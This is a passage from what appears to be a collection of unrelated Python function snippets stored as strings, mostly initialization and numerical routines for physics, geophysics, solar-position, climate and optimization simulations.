= gradphi_x.v()\n gradp_y.v()[:, :] = gradphi_y.v()\n\n self.cc_data.fill_BC(\"x-velocity\")\n self.cc_data.fill_BC(\"y-velocity\")\n\n self.cc_data.fill_BC(\"gradp_x\")\n self.cc_data.fill_BC(\"gradp_y\")\n\n # increment the time\n if not self.in_preevolve:\n self.cc_data.t += self.dt\n self.n += 1", "def __call__(self, t_):\n X, Y, t, _n = self.X, self.Y, self.t, self._n\n x, y = 0, 0 # initial x and y return values\n for i in _n:\n p_i = 1 # initial lagrange 
polynomial value\n for j in _n:\n # if i != j: update lagrange polynomial\n if i != j: p_i *= (t_ - t[j]) / (t[i] - t[j])\n # mult ith control point by ith lagrange polynomial\n # (ith control point maps to ith time point)\n x += X[i] * p_i\n y += Y[i] * p_i\n return x, y", "def calc_refl(velocity, shotloc_x, shotloc_z, layer_idxs):\n solver_dg = pykonal.EikonalSolver(coord_sys=\"cartesian\")\n solver_dg.vv.min_coords = velocity.min_coords\n solver_dg.vv.node_intervals = velocity.node_intervals\n solver_dg.vv.npts = velocity.npts\n solver_dg.vv.values = velocity.values\n\n #shotloc = 2.56 # km\n src_idx = (int((shotloc_x - velocity.min_coords[0])/velocity.node_intervals[0]), int(shotloc_z/velocity.node_intervals[1]), 0)\n solver_dg.tt.values[src_idx] = 0\n solver_dg.unknown[src_idx] = False\n solver_dg.trial.push(*src_idx)\n solver_dg.solve()\n\n solver_ug = pykonal.EikonalSolver(coord_sys=\"cartesian\")\n solver_ug.vv.min_coords = solver_dg.vv.min_coords\n solver_ug.vv.node_intervals = solver_dg.vv.node_intervals\n solver_ug.vv.npts = solver_dg.vv.npts\n solver_ug.vv.values = solver_dg.vv.values\n\n for ix in range(solver_ug.tt.npts[0]):\n #idx = (ix, solver_ug.tt.npts[1]-1, 0)\n idx = (ix, layer_idxs[ix], 0)\n solver_ug.tt.values[idx] = solver_dg.tt.values[idx]\n #print(idx, solver_dg.tt.values[idx])\n solver_ug.unknown[idx] = False\n solver_ug.trial.push(*idx)\n solver_ug.solve()\n \n return solver_ug.tt.values[:,0,0]", "def LAT(self):\n # The maximum update amount for these element\n LateralFraction_DELTA = self.dt * (self.LateralFraction_LIMITS[1] -\n self.LateralFraction_LIMITS[0]) / (\n 2.0)\n\n # Add either positive or negative or zero delta for each\n # NOTE: 'High' is open bracket ) so the max is 1\n LateralFraction_DIRECTION = np.random.randint(-1, 2, 1)[0]\n\n # Now, modify modifiable params AND CLIP\n self.LateralFraction += LateralFraction_DIRECTION * LateralFraction_DELTA\n self.LateralFraction = np.clip(self.LateralFraction,\n self.LateralFraction_LIMITS[0],\n self.LateralFraction_LIMITS[1])", "def initial_velocity(self) -> float:\n return self._initial_velocity", "def initialize(self, state_space, state_positions, **__):\n # for organization purposes\n interval = self._initializer['interval']\n random_dist = self._initializer['random_init']\n random_params = self._initializer['random_params']\n self._initial_states.update(self._default_initializer['states'])\n if self._initializer['states'] is not None:\n self._initial_states.update(self._initializer['states'])\n\n # different limits for InductionMotor\n if any(state in self._initial_states for state in ['psi_ralpha', 'psi_rbeta']):\n # caution: _initial_limits sometimes contains singleton ndarrays, they must be\n # extracted with .item()\n nominal_values_ =\\\n [self._initial_limits[state].item() if isinstance(self._initial_limits[state], np.ndarray)\n else self._initial_limits[state] for state in self._initial_states]\n upper_bound = np.asarray(np.abs(nominal_values_), dtype=float)\n # state space for Induction Envs based on documentation\n # ['i_salpha', 'i_sbeta', 'psi_ralpha', 'psi_rbeta', 'epsilon']\n # hardcoded for induction motors currently given in the toolbox\n state_space_low = np.array([-1, -1, -1, -1, -1])\n lower_bound = upper_bound * state_space_low\n else:\n if isinstance(self._nominal_values, dict):\n nominal_values_ = [self._nominal_values[state]\n for state in self._initial_states.keys()]\n nominal_values_ = np.asarray(nominal_values_)\n else:\n nominal_values_ = np.asarray(self._nominal_values)\n\n 
state_space_idx = [\n state_positions[state] for state in self._initial_states.keys()\n ]\n\n upper_bound = np.asarray(nominal_values_, dtype=float)\n lower_bound = upper_bound * \\\n np.asarray(state_space.low, dtype=float)[state_space_idx]\n # clip nominal boundaries to user defined\n if interval is not None:\n lower_bound = np.clip(\n lower_bound,\n a_min=np.asarray(interval, dtype=float).T[0],\n a_max=None\n )\n upper_bound = np.clip(\n upper_bound,\n a_min=None,\n a_max=np.asarray(interval, dtype=float).T[1]\n )\n # random initialization for each motor state (current, epsilon)\n if random_dist is not None:\n if random_dist == 'uniform':\n initial_value = (upper_bound - lower_bound) \\\n * self._random_generator.uniform(size=len(self._initial_states.keys())) \\\n + lower_bound\n # writing initial values in initial_states dict\n random_states = {\n state: initial_value[idx] for idx, state in enumerate(self._initial_states.keys())\n }\n self._initial_states.update(random_states)\n\n elif random_dist in ['normal', 'gaussian']:\n # specific input or middle of interval\n mue = random_params[0] or (\n upper_bound - lower_bound) / 2 + lower_bound\n sigma = random_params[1] or 1\n a, b = (lower_bound - mue) / sigma, (upper_bound - mue) / sigma\n initial_value = truncnorm.rvs(\n a, b, loc=mue, scale=sigma, size=(\n len(self._initial_states.keys())),\n random_state=self.seed_sequence.pool[0]\n )\n # writing initial values in initial_states dict\n random_states = {\n state: initial_value[idx] for idx, state in enumerate(self._initial_states.keys())\n }\n self._initial_states.update(random_states)\n\n else:\n raise NotImplementedError\n # constant initialization for each motor state (current, epsilon)\n elif self._initial_states is not None:\n initial_value = np.atleast_1d(list(self._initial_states.values()))\n # check init_value meets interval boundaries\n if ((lower_bound <= initial_value).all()\n and (initial_value <= upper_bound).all()):\n initial_states_ = \\\n {state: initial_value[idx]\n for idx, state in enumerate(self._initial_states.keys())}\n self._initial_states.update(initial_states_)\n else:\n raise Exception(\n 'Initialization value has to be within nominal boundaries')\n else:\n raise Exception('No matching Initialization Case')", "def initialize_constants(self):\n # maximum pheromone value\n self.PH_MAX = np.float_( len(self.variables) / (1.0 - self.PH_REDUCE_FACTOR))\n # minimum pheromone value\n self.PH_MIN = np.float_(self.PH_MAX / (2*len(self.variables)) )", "def __init__(self):\n super().__init__()\n self.location = 0.0\n self.scale = 1.0\n self.type = 'Laplace'\n self.distType = 'Continuous'\n self.hasInfiniteBound = True\n self.compatibleQuadrature.append('CDF')\n self.preferredQuadrature = 'CDF'\n self.preferredPolynomials = 'CDF'", "def _compute_solar_torque(self):\n pass", "def __init__(\n self,\n velocity_north_m_s,\n velocity_east_m_s,\n velocity_down_m_s):\n self.velocity_north_m_s = velocity_north_m_s\n self.velocity_east_m_s = velocity_east_m_s\n self.velocity_down_m_s = velocity_down_m_s", "def get_start_velocity(self):\n # uniform circular motion have a start velocity of omega\n # TODO generate from start position and rotation direction\n return np.array([0, self.wz, 0])", "def setup_stellar_aberration(self,observer_velocity_xyz):\n self.v_for_stellar_aberr = sp.vscl(recip_clight,observer_velocity_xyz)", "def initialise(self):\n for i in range(self.nx):\n self.T[:, i] = (\n self.t_sun\n + self.mu\n * self.m_u\n * self.nabla\n * self.g\n * (self.y - self.y_max)\n / 
self.kb\n            )\n        self.P = self.p_sun * (self.T / self.t_sun) ** (1 / self.nabla)\n\n        if self.Gaussian_perturbation:\n            x_mean = 6e6\n            y_mean = 2e6\n            sigma = 8e5\n            xx, yy = np.meshgrid(self.x, self.y)\n            gaussian = self.t_sun * np.exp(\n                -((xx - x_mean) ** 2 + (yy - y_mean) ** 2) / (2 * sigma ** 2)\n            )\n            self.T[:, :] = self.T[:, :] + gaussian\n\n        self.rho[:, :] = self.P * self.mu * self.m_u / (self.kb * self.T[:, :])\n        self.e[:, :] = self.P[:, :] / (self.Y - 1)", "def linear_evolve(self,nt=1):\n        for l in range(nt):\n            y_temp = np.empty(self.y.shape[0])\n            for i in range(self.y.shape[0]):\n                \n                # idx left to the departure point\n                j = int(np.floor((self.x[i]-self.u[i]*self.dt)/self.dx))\n                # idx right to the departure point\n                k = j+1\n                print i, j, k\n                # linear interpolation\n                alpha = (self.x[i]-self.u[i]*self.dt - j*self.dx)/self.dx\n                y_temp[i] = (1-alpha)*self.y[j] + alpha*self.y[k]\n            # copy array to current time\n            self.y = np.copy(y_temp)\n        #return current variable\n        return self.y", "def initial_values(self):\n        y = self._y\n        trend = self.trend\n        seasonal = self.seasonal\n        seasoning = self.seasoning\n        trending = self.trending\n        m = self.seasonal_periods\n        l0 = self._l0\n        b0 = self._b0\n        if seasoning:\n            l0 = y[np.arange(self.nobs) % m == 0].mean() if l0 is None else l0\n            if b0 is None and trending:\n                lead, lag = y[m:m + m], y[:m]\n                if trend == 'mul':\n                    b0 = np.exp((np.log(lead.mean()) - np.log(lag.mean())) / m)\n                else:\n                    b0 = ((lead - lag) / m).mean()\n            s0 = list(y[:m] / l0) if seasonal == 'mul' else list(y[:m] - l0)\n        elif trending:\n            l0 = y[0] if l0 is None else l0\n            if b0 is None:\n                b0 = y[1] / y[0] if trend == 'mul' else y[1] - y[0]\n            s0 = []\n        else:\n            if l0 is None:\n                l0 = y[0]\n            b0 = None\n            s0 = []\n\n        return l0, b0, s0", "def solar_model():\n    \n    latitude, longitude, timezone, elevation = location_input()\n    year, time = time_input()\n\n    lat_r = latitude/180*np.pi\n    lon_r = longitude/180*np.pi \n    n = 0\n    for i in range(1900,year):\n        if i%4 == 0:\n            n += 366\n        else:\n            n+=365\n    JulD = n + time + 2415018.5 - (timezone)/24\n    LT = time - int(time)\n    JC = (JulD - 2451545) / 36525\n    x = 46.815 + JC * (0.00059 - JC * 0.001813)\n    M_OE = 23 + (26 + (21.448 - JC * x) / 60) / 60\n    EEO = 0.016708634 - JC * (0.000042037 + 0.0000001267 * JC)\n    GMAS = 357.52911 + JC * (35999.05029 - 0.0001537 * JC)\n    GMAS_r = m.radians(GMAS)\n    GMLS = (280.46646 + JC * (36000.76983 + JC * 0.0003032))%360\n    GMLS_r = m.radians(GMLS)\n    Obliq_C = M_OE + 0.00256 * np.cos((125.04 - 1934.136 * JC) / 180 * np.pi)\n    Obliq_C_r = m.radians(Obliq_C)\n    SEC = np.sin(GMAS_r) * (1.914602 - JC * (0.004817 + 0.000014 * JC)) + np.sin(2 * GMAS_r) * (0.019993 - 0.000101 * JC) + np.sin(3 * GMAS_r) * 0.000289\n    STL = GMLS + SEC\n    SAL = STL - 0.00569 - 0.00478 * np.sin((125.04 - 1934.136 * JC) / 180 * np.pi)\n    SAL_r = m.radians(SAL)\n    sin_Delta = np.sin(Obliq_C_r) * np.sin(SAL_r)\n    Delta_r = np.arcsin(sin_Delta) #in radians \n    Var_y = np.tan((Obliq_C / 2) / 180 * np.pi) * np.tan((Obliq_C / 2) / 180 * np.pi)\n    EOT_prime = Var_y * np.sin(2 * GMLS_r) - 2 * EEO * np.sin(GMAS_r) + 4 * EEO * Var_y * np.sin(GMAS_r) * np.cos(2 * GMLS_r) - 0.5 * Var_y * Var_y * np.sin(4 * GMLS_r) - 1.25 * EEO * EEO * np.sin(2 * GMAS_r)\n    EOT = 4 * EOT_prime / np.pi * 180 \n    TST = (LT * 1440 + EOT + 4 * longitude - 60 * timezone)%1440\n    if TST / 4 < 0:\n        Omega = TST/4+180\n    else:\n        Omega = TST/4 - 180 \n    Omega_r = m.radians(Omega)\n    \n    cos_Zenith = np.sin(lat_r) * np.sin(Delta_r) + np.cos(lat_r) * np.cos(Delta_r) * np.cos(Omega_r)\n    Zenith_r = np.arccos(cos_Zenith) #in 
radians\n Aprime_r = np.arccos((np.sin(lat_r) * np.cos(Zenith_r) - np.sin(Delta_r)) / (np.cos(lat_r) * np.sin(Zenith_r)))\n Aprime = Aprime_r / np.pi * 180\n if Omega > 0:\n Azimuth = (Aprime + 180) % 360 #in degrees\n else:\n Azimuth = (540 - Aprime) % 360 #in degrees \n Azimuth_r = Azimuth / 180 * np.pi\n Elev_angle = (np.pi)/2 - Zenith_r\n\n \n # calculate incidence angle\n # Beta is equal to angle of tilted surface to horizontal (in radians)\n Beta = 45 # in degrees\n Beta_r = m.radians(Beta)\n \n cos_incidence = np.sin(Delta_r)* np.sin(lat_r) * np.cos(Beta_r) - np.sin(Delta_r) * np.cos(lat_r) * np.sin(Beta_r) * np.cos(Azimuth_r) + np.cos(Delta_r) * np.cos(lat_r) * np.cos(Beta_r) * np.cos(Omega_r) + np.cos(Delta_r) * np.sin(lat_r) * np.sin(Beta_r) * np.cos(Azimuth_r) * np.cos(Omega_r) + np.cos(Delta_r) * np.sin(Beta_r) * np.sin(Azimuth_r) * np.sin(Omega_r) \n incidence_ang_r = np.arccos(cos_incidence)\n \n return Delta_r, lat_r, Omega_r, Zenith_r, Azimuth_r, Elev_angle", "def init_env_variables(self):\n self.total_distance_moved = 0.0\n self.current_y_distance = self.get_y_dir_distance_from_start_point(self.start_point)\n self.cart_current_speed = rospy.get_param('/cart_pole_3d/init_cart_vel')", "def get_age_grad(self,renew=False):\n\t\ttry:\n\t\t\tdriv_lat = self['deriv_lat'].value\n\t\t\tdriv_lon = self['deriv_lon'].value\n\t\t\tdriv_msk = self['deriv_msk'].value\n\t\texcept:\n\t\t\tself._cal_age_grad()\n\t\tderiv_lat = self['deriv_lat'].value\n\t\tderiv_lon = self['deriv_lon'].value\n\t\tderiv_msk = self['deriv_msk'].value\n\t\tage_lon_Vec = self['age_lon_Vec'].value\n\t\tage_lat_Vec = self['age_lat_Vec'].value\n\t\txx, yy = np.meshgrid(age_lon_Vec, age_lat_Vec) # xx for longitude, yy for latitude\n\t\txx = xx.reshape(xx.size)\n\t\tyy = yy.reshape(yy.size)\n\t\tf_deriv_lat = NearestNDInterpolator(np.column_stack((xx,yy)),deriv_lat.reshape(deriv_lat.size),rescale=False)\n\t\tf_deriv_lon = NearestNDInterpolator(np.column_stack((xx,yy)),deriv_lon.reshape(deriv_lon.size),rescale=False)\n\t\tf_deriv_msk = NearestNDInterpolator(np.column_stack((xx,yy)),deriv_msk.reshape(deriv_msk.size),rescale=False)\n\t\tfor period in self.attrs['prd_arr']:\n\t\t\tgroup = self['%g_sec'%( period )]\n\t\t\tlons_orig = group['lonArr'].value\n\t\t\tlons = lons_orig.reshape(lons_orig.size)\n\t\t\tlats = group['latArr'].value.reshape(lons_orig.size)\n\t\t\tderiv_lat_Arr = f_deriv_lat(np.column_stack((lons,lats))).reshape(lons_orig.shape)\n\t\t\tderiv_lon_Arr = f_deriv_lon(np.column_stack((lons,lats))).reshape(lons_orig.shape)\n\t\t\tderiv_msk_Arr = f_deriv_msk(np.column_stack((lons,lats))).reshape(lons_orig.shape)\n\t\t\tif renew:\n\t\t\t\tdel group['age_deriv_lat_Arr']\n\t\t\t\tdel group['age_deriv_lon_Arr']\n\t\t\t\tdel group['age_deriv_msk_Arr']\n\t\t\tgroup.create_dataset(name='age_deriv_lat_Arr', data=deriv_lat_Arr)\n\t\t\tgroup.create_dataset(name='age_deriv_lon_Arr', data=deriv_lon_Arr)\n\t\t\tgroup.create_dataset(name='age_deriv_msk_Arr', data=deriv_msk_Arr)\n\t\tpass", "def initialise(self, initial=None):\r\n ticy = python_time.clock()\r\n if hasattr(self, 'redef_F_laplacian') or \\\r\n hasattr(self, 'redef_f_norm_grad'):\r\n print(\"ht3_solver:\\tVariables resassigned to known solution.\")\r\n assert (hasattr(self, 'redef_F_laplacian'))\r\n assert (hasattr(self, 'redef_f_norm_grad'))\r\n self.redefined = True\r\n\r\n self._print_setup()\r\n\r\n # Add all elem DoFs to NodeMapping\r\n for elem in self.mesh.elems.values():\r\n self.node_map.tags_to_idxs(elem.elem_node_tag_gen())\r\n\r\n # Set initial 
condition.\r\n t0 = np.zeros(self.node_map.count, dtype=np.float64)\r\n if initial is None:\r\n for elem in self.mesh.elems.values():\r\n idxs = self.node_map.tags_to_idxs(elem.elem_node_tag_gen())\r\n t0[idxs[:elem.dnen()]] = self.initial_temperature\r\n else:\r\n for elem in self.mesh.elems.values():\r\n idxs = self.node_map.tags_to_idxs(elem.elem_node_tag_gen())\r\n coords = elem.node_coords()\r\n for i in range(len(idxs)):\r\n t0[idxs[i]] = initial(coords[i, 0], coords[i, 1])\r\n self.lst_tmp = t0\r\n\r\n # Just to have the correct length list. Should be skipped over anyway.\r\n self.lst_rad = [np.zeros(len(t0), dtype=np.float64)\r\n for a in self.fq_list]\r\n # Setup constant matrices\r\n self.uv_vol = et.elems_2_csc(self.mesh,\r\n et.uv_mtrx,\r\n self.node_map)\r\n self.uv_vol.description = \"Integral of test function * weight \" \\\r\n + \"over element volumes.\"\r\n self.guv_vol = et.elems_2_csc(self.mesh,\r\n et.gu_gv_mtrx,\r\n self.node_map)\r\n self.guv_vol.description = \"Integral of test function laplacian *\" \\\r\n + \" weight function laplacian over element volumes.\"\r\n self.uv_bound = et.edge_2_csc(self.mesh,\r\n \"Boundary\",\r\n et.uv_mtrx,\r\n self.node_map)\r\n self.uv_bound.description = \"Integral of test function * weight \" \\\r\n + \" function over domain boundary.\"\r\n self._print_matrix_info(self.uv_vol, \"UV over volume\")\r\n self._print_matrix_info(self.guv_vol, \"Grad U dot Grad V over volume\")\r\n self._print_matrix_info(self.uv_bound, \"UV over boundary\")\r\n tocy = python_time.clock()\r\n print(\"ht3_solver:\\tCompleted initialisation in \" + str(tocy - ticy)\r\n + \" s.\")", "def get_initial_params(self, x, y, yerr):\n p = [0,0]\n p[1] = min(y)\n p[0] = (max(y)-min(y))/(max(x)-min(x))\n return array(p)", "def _initialise_run(self) -> None:\n assert self._coords is not None and self._species is not None\n\n if np.isclose(self._coords.delta, 0.0):\n raise RuntimeError(\"Zero distance between the dimer points\")\n\n self._coords._g = np.zeros(shape=(3, 3 * self._species.n_atoms))\n\n # TODO: Hessian. 
Ref [1] shows that a BFGS step to the translation\n # and rotation -> faster convergence than SD steps\n\n self._update_gradient_at(DimerPoint.midpoint)\n self._update_gradient_at(DimerPoint.left)\n\n return None", "def __init__(self,\n time_step: float,\n acceleration: Callable[[float], float],\n initial_value: float = 0.0,\n initial_velocity: float = 0.0,\n num_steps: int = 50,\n collected_data: Iterable[Dict[str, float]] = [],\n time_cumulation: float = 100,\n acceleration_error_constant: float = 10.0,\n start_time: float = 0.0):\n self.acceleration = acceleration\n self._timestep = time_step\n self._start_time = start_time\n\n self._previous_values = [None] * num_steps\n self._previous_values[0] = initial_value\n self._previous_values[1] = (\n time_step * initial_velocity + initial_value)\n\n self._initial_value = initial_value\n self._initial_velocity = initial_velocity\n\n self._num_steps = num_steps\n self._max_collected_data_time: float = max(\n map(operator.itemgetter('time'), collected_data), default=0.0)\n self._collected_data = collected_data\n self.feedback = unary_linear_interpolator.UnaryLinearInterpolator(\n list(map(operator.itemgetter('time'), collected_data)),\n list(map(operator.itemgetter('altitude'), collected_data)))\n\n self._last_index = self.fill_values(self._previous_values)\n\n self.past_n_steps = math.ceil(time_cumulation / (time_step * 1000))\n self._acceleration_error_constant = acceleration_error_constant\n self._velocity_storage = []", "def initializeValuesVectors(self):\n\n\t\tnCells = self.getNbins(\"f\")\n\t\tnCora = self.getNbins(\"i\")\n\t\tnCorb = self.getNbins(\"j\")\n\t\tnCorc = self.getNbins(\"k\")\n\t\tnDir = self.getNbins(\"d\")\n\t\tnUsr = self.getNbins(\"u\")\n\t\tnSeg = self.getNbins(\"s\")\n\t\tnMul = self.getNbins(\"m\")\n\t\tnCos = self.getNbins(\"c\")\n\t\tnErg = self.getNbins(\"e\")\n\t\tnTim = self.getNbins(\"t\")\n\n\t\tself.valsErrors = np.empty( ( nCells , nDir , nUsr , nSeg , nMul , nCos , nErg , nTim , nCora , nCorb , nCorc , 2 ) , dtype=float)\n\n\t\t#self.valsErrors = [[[[[[[[[[[[[] for _ in xrange(2)] for _ in xrange(nCorc)] for _ in xrange(nCorb)] for _ in xrange(nCora)] for _ in xrange(nTim)] \n\t\t#\t\t\t\t for _ in xrange(nErg)] for _ in xrange(nCos)] for _ in xrange(nMul)] for _ in xrange(nSeg)] for _ in xrange(nUsr)] \n\t\t#\t\t\t\t for _ in xrange(nDir)] for _ in xrange(nCells)]\n\n\t\tself.isInitialized = True", "def _calc_longitudes(self):\n assert self.tracers\n\n # zp is z unit vector at all times, shape 501 x 3\n zp = np.cross(self.p0_positions, self.p0_velocities)\n zp = zp / np.linalg.norm(zp, axis=-1)[:, None]\n\n # xp and yp are x and y unit vectors\n xp = self.p0_positions\n xp = xp / np.linalg.norm(xp, axis=-1)[:, None]\n yp = np.cross(zp, xp)\n\n # project particle positions into orbital x-y plane\n p1_xp = np.sum(self.p1_positions * xp[:, None, :], axis=-1)\n p1_yp = np.sum(self.p1_positions * yp[:, None, :], axis=-1)\n p2_xp = np.sum(self.p2_positions * xp[:, None, :], axis=-1)\n p2_yp = np.sum(self.p2_positions * yp[:, None, :], axis=-1)\n\n # get longitudes\n p1_phi = np.arctan2(p1_yp, p1_xp)\n p2_phi = np.arctan2(p2_yp, p2_xp)\n\n # add/subtract multiples of 2pi for particles on higher wraps.\n dp = np.vstack((np.zeros((1, self.N1)), np.diff(p1_phi, axis=0)))\n for j in range(self.N1):\n changes = np.where(np.abs(dp[:, j]) > 1.1 * pi)[0]\n for i in range(changes.size):\n p1_phi[changes[i]:, j] -= 2 * pi * np.sign(dp[changes[i], j])\n dp = np.vstack((np.zeros((1, self.N2)), np.diff(p2_phi, axis=0)))\n for j 
in range(self.N2):\n changes = np.where(np.abs(dp[:, j]) > 1.1 * pi)[0]\n for i in range(changes.size):\n p2_phi[changes[i]:, j] -= 2 * pi * np.sign(dp[changes[i], j])\n\n return p1_phi, p2_phi", "def init_pvelocity(self, individuals):\n for individual in individuals:\n # the initial speed is set to zero\n individual.features['velocity'] = [0] * len(individual.vector)\n\n return", "def initial_importer(initials, initialZMT=True):\n from .functions import cosd, lna\n ###filling the running variables with values depending on the systemconfiguration in rk4input###\n\n if Base.spatial_resolution == 0:\n dim = 0\n print('0D')\n Vars.T = initials['zmt']\n else:\n dim = 1\n # NS==True corresponds to southpole to northpole representation (180 Degrees)\n if Base.both_hemispheres == True:\n Latrange = 180\n\n # Checking if Temperature and Latitude is set on a latitudal circle (0°,10°,..if step=10)\n # or on a latitudinal belt and therefore between the boundaries (5°,15°,..if step=10)\n\n # circle==True and belt==False says on the latitudinal circle\n if Base.latitudinal_circle == True and Base.latitudinal_belt == False:\n Vars.Lat = np.linspace(-90 + Base.spatial_resolution, 90 - Base.spatial_resolution,\n int(Latrange / Base.spatial_resolution - 1))\n Vars.Lat2 = np.linspace(-90, 90 - Base.spatial_resolution,\n int(Latrange / Base.spatial_resolution)) + Base.spatial_resolution / 2\n if initialZMT == True:\n Vars.T = np.array([initials['zmt']] * int(Latrange / Base.spatial_resolution - 1))\n # Checking if the Temperature for each latitude starts with the same value or a\n # cosine shifted value range\n if initials['initial_temperature_cosine'] == True:\n Vars.T = Vars.T + initials['initial_temperature_amplitude'] * (cosd(Vars.Lat) - 1)\n\n # circle==False and belt==True say on the latitudinal belt\n if Base.latitudinal_circle == False and Base.latitudinal_belt == True:\n Vars.Lat2 = np.linspace(-90 + Base.spatial_resolution, 90 - Base.spatial_resolution,\n int(Latrange / Base.spatial_resolution - 1))\n Vars.Lat = np.linspace(-90, 90 - Base.spatial_resolution,\n int(Latrange / Base.spatial_resolution)) + Base.spatial_resolution / 2\n if initialZMT == True:\n Vars.T = np.array([initials['zmt']] * int(Latrange / Base.spatial_resolution))\n if initials['initial_temperature_cosine'] == True:\n if initials['initial_temperature_noise'] == True:\n z = [0] * len(Vars.Lat)\n for k in range(len(Vars.Lat)):\n z[k] = np.random.normal(0, initials['initial_temperature_noise_amplitude'])\n else:\n z = 0\n Vars.T = Vars.T + initials['initial_temperature_amplitude'] * (cosd(Vars.Lat) - 1) + lna(z)\n\n # Not from southpole to northpole rather equator to pole\n else:\n Latrange = 90\n if Base.latitudinal_circle == True and Base.latitudinal_belt == False:\n Vars.Lat = np.linspace(0, 90 - Base.spatial_resolution, int(Latrange / Base.spatial_resolution))\n Vars.Lat2 = np.linspace(0, 90 - Base.spatial_resolution,\n int(Latrange / Base.spatial_resolution)) + Base.spatial_resolution / 2\n if initialZMT == True:\n Vars.T = np.array([initials['zmt']] * int(Latrange / Base.spatial_resolution))\n if initials['initial_temperature_cosine'] == True:\n Vars.T = Vars.T + initials['initial_temperature_amplitude'] * (cosd(Vars.Lat) - 1)\n if Base.latitudinal_circle == False and Base.latitudinal_belt == True:\n Vars.Lat2 = np.linspace(0, 90 - Base.spatial_resolution, int(Latrange / Base.spatial_resolution))\n Vars.Lat = np.linspace(0, 90 - Base.spatial_resolution,\n int(Latrange / Base.spatial_resolution)) + Base.spatial_resolution / 
2\n if initialZMT == True:\n Vars.T = np.array([initials['zmt']] * int(Latrange / Base.spatial_resolution))\n if initials['initial_temperature_cosine'] == True:\n Vars.T = Vars.T + initials['initial_temperature_amplitude'] * (cosd(Vars.Lat) - 1)\n\n Vars.t = initials['time']\n if Base.parallelization == True:\n if initialZMT == True:\n Vars.T = np.array([Vars.T] * Base.number_of_parallels)\n Vars.T_global = np.array([initials['gmt']] * Base.number_of_parallels)\n else:\n Vars.T_global = initials['gmt']", "def init_pvelocity(self, population):\n for individual in population:\n # the initial speed is set to zero\n individual.features['velocity'] = [0] * len(individual.vector)\n\n return", "def __init__(self,):\r\n self.g = 9.81\r\n self.l = 0.5\r\n self.m1 = 1.0\r\n self.m2 = 1.0\r\n self.m3 = 1.0\r\n self.r1 = 1.0\r\n self.r2 = 1.0\r\n self.tau = 0.001\r\n self.theta1 = 1.0\r\n self.theta2 = 1.0\r\n self.theta3 = 1.0", "def get_initial_params(self, x, y, yerr):\n# p0 = zeros(self.max_phonons + 1)\n p0 = zeros(2)\n p0[0] = 100\n p0[1] = .1\n return p0", "def _core_init_params(self) :\n\t\ta_list,b_list = [],[]\n\t\tg_list,h_list = [],[]\n\t\t\n\t\t\n\t\tfor eqnid,eqn in enumerate(self.equations) : \n\t\t\treg_p = self.regressors[eqnid]['prod']\n\t\t\treg_d = self.regressors[eqnid]['degrad']\n\t\t\th_eqn = self.initsol['h'][eqn-1]\n\t\t\tg_eqn = self.initsol['g'][eqn-1]\n\n\n\t\t\ta_list.append(self.initsol['alpha'][eqn-1])\n\t\t\tb_list.append(self.initsol['beta'][eqn-1])\n\t\t\t\n\t\t\tg_eqn = np.array([g_eqn[reg-1] for reg in reg_p])\n\t\t\th_eqn = np.array([h_eqn[reg-1] for reg in reg_d])\n\t\t\th_list.append(h_eqn)\n\t\t\tg_list.append(g_eqn)\n\t\n\t\treturn (a_list,b_list,g_list,h_list)", "def initialize(self):\n#TODO: choose user defined START position\n values_type = np.dtype(float)\n self.visual_field = np.zeros(self.number_of_locs, dtype=values_type)\n self.weighted_sums = np.zeros(self.number_of_locs, dtype=values_type)\n self.prior_prob = 1.0 / np.prod(self.number_of_locs)\n self.post_probs = np.full(\n self.number_of_locs, self.prior_prob, dtype=values_type\n )\n starting_location = np.array(START)\n self.focus = get_index_of_in(starting_location,self.senzory_map)\n self.target_location = [\n x for x in xrange(self.number_of_locs) if x != self.focus\n ][random.randint(0,self.number_of_locs-2)]", "def comp_vel(p1=database['K+'], p2=database['pi+'], p3=database['p+'], pmin=0, pmax=80):\r\n p_range = np.linspace(pmin, pmax, 1000)\r\n m1 = p1.mass\r\n m2 = p2.mass\r\n m3 = p3.mass\r\n v1, v2, v3 = [], [], []\r\n for p in p_range:\r\n v1.append(c*beta(p, m1))\r\n v2.append(c*beta(p, m2))\r\n v3.append(c*beta(p, m3))\r\n fig = plt.figure(figsize=[10, 5])\r\n ax = fig.add_subplot(1, 1, 1)\r\n p1_name = r'K$^+$'\r\n p2_name = r'$\\pi^+$'\r\n p3_name = r'p$^+$'\r\n ax.plot(p_range, v1, 'r', label=p1_name)\r\n ax.plot(p_range, v2, 'b', label=p2_name)\r\n ax.plot(p_range, v3, 'g', label=p3_name)\r\n ax.set_xlabel('p / GeV', fontsize=20)\r\n ax.set_ylabel(r'v / $ms^{-1}$', fontsize=20)\r\n ax.axvline(75, color='k', label='p = 75 GeV')\r\n ax.set_xticks(np.arange(pmin, pmax+1, 1))\r\n ax.set_xticklabels(np.arange(pmin, pmax+1, 1))\r\n ax.grid()\r\n ax.minorticks_on()\r\n ax.set_xlim(pmin, pmax)\r\n# ax.set_ylim(np.min(v1+v2))\r\n ax.legend(fontsize=20)\r\n plt.show\r\n return", "def get_initial_params(self, x, y, yerr):\n ampl = y[0]\n offset = 0\n tau = log(y[-1] / float(y[0])) / (x[-1] - x[0])\n if self.amplitude != None:\n p0 = array([tau])\n else:\n if self.offset:\n p0 = array([tau, 
ampl, offset])\n else:\n p0 = array([tau, ampl])\n return p0", "def get_initial_params(self, x, y, yerr):\n estimated_height = max(y)\n y1 = map(int, y *1000)\n estimated_position = x[ y1.index(max(y1)) ]\n estimated_width = (max(x) - min(x)) / 20.0\n p0 = array([estimated_position, estimated_width, estimated_height])\n return p0", "def get_initial_params(self, x, y, yerr):\n estimated_height = max(y)\n y1 = map(int, y *1000)\n estimated_position = x[ y1.index(max(y1)) ]\n estimated_width = (max(x) - min(x)) / 20.0\n p0 = array([estimated_position, estimated_width, estimated_height])\n return p0", "def _get_init_pose(self):\n return self.init_pose_R, self.init_pose_t", "def _setup_params(self) -> None:\n self.i = 0 # Year\n self.ela = self.ela_start # Equilibrium line altitude\n self.steady_state = False # Control variable for steady state\n self.fracd8_mode = \"limited\" # Mode of the fracd8 algorithm", "def update_variables(self):\n self.dl21 = self.l21-self.l11; self.dl22 = self.l22-self.l12; self.dl23 = self.l23-self.l13;\n self.kappa1, self.phi1, self.seg_len1 = self.configuration_space(self.l11, self.l12, self.l13, self.d, self.n)\n self.kappa2, self.phi2, self.seg_len2 = self.configuration_space(self.dl21, self.dl22, self.dl23, self.d, self.n)\n # aquire transformation matrices and tips for segment 1 and 2\n self.T01_bishop = self.transformation_matrix_bishop(self.kappa1, self.phi1, self.seg_len1)\n 